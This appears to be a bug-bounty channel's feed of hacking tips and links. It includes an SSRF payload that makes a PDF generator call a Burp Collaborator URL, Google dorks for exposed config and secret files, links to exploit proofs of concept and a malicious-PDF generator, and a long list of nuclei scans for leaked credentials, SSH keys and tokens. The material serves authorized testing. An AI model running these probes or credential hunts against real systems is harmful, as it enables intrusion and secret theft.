🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunters,
DarkShadow here, back again!
SSRF in PDF generation!
This API endpoint sends the PDF generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src="burp collab url" />
It comes back 200 OK and a request hits Burp Collaborator.
You can follow me on x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an application's DLL, they would have the ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
I request a small support in boosting my channel, which will help me to be more consistent and more active...
/channel/boost/bugbounty_tech
Based on the poll, I have understood that the members of the group are looking for AI content too. Thanks for all the responses; I will plan what content should be added here and what should not.
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/
BB Target - https://cybozu.co.jp/en/company/products/bug-bounty/
https://www.youtube.com/watch?v=griDEeIcXQc
Hey Hunters,
DarkShadow here, back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub → https://github.com/projectdiscovery/awesome-search-queries
Show your love, guys ❤️
#bugbountytips #osint
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂Step 2: Extract only main/root domains
`awk -F '.' 'NF >= 2 {print $(NF-1)"."$NF}' domains.txt | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥
site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍
site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
©TakSec
https://x.com/livingdevops/status/1974105605431349682?t=zhTSA-5rSrgr27dqGo-QSw&s=35
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on real-world CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
Bypass SQL union select
Active Directory Pentesting
https://exploit-notes.hdks.org/exploit/windows/active-directory/
🔥 Find Low Hanging Fruits Using Nuclei AI 🔥
nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"
nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"
nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"
nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"
nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"
nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"
nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"
nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"
nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."
nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."
nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."
nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."
nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."
nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"
nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"
nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"
nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"
nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"
nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"
nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"
nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"
nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"
nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"
nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"
nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"
nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"
nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"
nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."